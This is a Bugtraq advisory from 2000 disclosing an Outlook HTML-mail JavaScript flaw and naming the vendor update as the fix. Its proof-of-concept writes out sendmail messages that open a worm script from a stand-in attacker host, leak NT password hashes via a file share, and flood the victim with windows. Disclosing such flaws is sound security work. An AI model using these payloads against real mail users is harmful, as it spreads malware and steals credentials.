Bugtraq mailing list archives
Microsoft Outlook Malicious URL Vulnerability
From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Fri, 9 Jun 2000 09:29:26 -0800
[ Microsoft Outlook Malicious URL Vulnerability ] [ cassius () hushmail com ] [ Description ] Outlook HTML messages with embedded JavaScript window.open() calls can automatically open malicious URLs. An attacker could use this vulnerability to make it appear that the user has received an attachment that has passed all SMTP scanners. The risk here is high, as this vulnerability could allow another 'ILoveYou' type virus to propagate with minimal resistance. This vulnerability also opens Outlook and possibly other HTML/JavaScript enabled E-mail clients to a variety of other malicious URL attacks. Examples of possible attacks seem to be endless. We have been able to send messages that, when opened, automatically send a NT users password hash to a box running L0phtCrack ( http://www.l0pht.com ) in SMB packet capture mode. This is a variation on a known attack that relies on social engineering to get the victim to click on a link within the message. We have tested the following exploits against Outlook 2000 and Outlook Express. Suppose all versions that allow HTML messages with embedded JavaScript are vulnerable. Outlook 2000 is not vulnerable when the message is viewed in the preview pane or if the Outlook Security Update has been installed. The solution for Outlook 98/2000 users is to install the Outlook E-mail Security Update. Outlook Express users should upgrade to Outlook 2000 or some other mail client. [ Proof of Concept ] The following examples use Sendmail to craft the messages. Outlook does not normally give you enough control of HTML message source to send these messages. Example 1 - Sending Fake Attachments % sendmail victim () example com MIME-Version: 1.0 Content-Type: text/html Subject: I love you not. <html><script language="JavaScript"><!-- window.open('http://evilcomputer.example.com/worm.vbs'); --></script>I have attached a file for you.</html> . When the victim opens the message an IE dialog box is displayed that prompts the user to open the file or download it. An unsuspecting user could be tricked into thinking that this 'attachment' has passed all SMTP security scans. Example 2 - Requesting NT Password Hashes Set up L0phtCrack to sniff SMB packets on evilcomputer. Then send the following message. % sendmail victim () example com MIME-Version: 1.0 Content-Type: text/html Subject: Give me your hash. <html><script language="JavaScript"><!-- window.open('file:////evilcomputer/sharename/thankyou.html'); --></script>Blah blah blah.</html> . Example 3 - Annoying DoS Attack % sendmail victim () example com MIME-Version: 1.0 Content-Type: text/html Subject: b00m! <html><script language="JavaScript"><!-- for (loop=0; loop < 1000; loop++) { window.open('about:<b><h1>Die!'); } --></script></html> . [ Disclaimer ] The information contained in this advisory is believed to be accurate at the time of printing, but no representation or warranty is given, express or implied, as to its accuracy or completeness. Neither the author nor the publisher accepts any liability whatsoever for any direct, indirect or consequential loss or damage arising in any way from any use of, or reliance placed on, this information for any purpose. IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages. Get your FREE, totally secure email address at http://www.hushmail.com.
Current thread:
- Microsoft Outlook Malicious URL Vulnerability cassius () HUSHMAIL COM (Jun 09)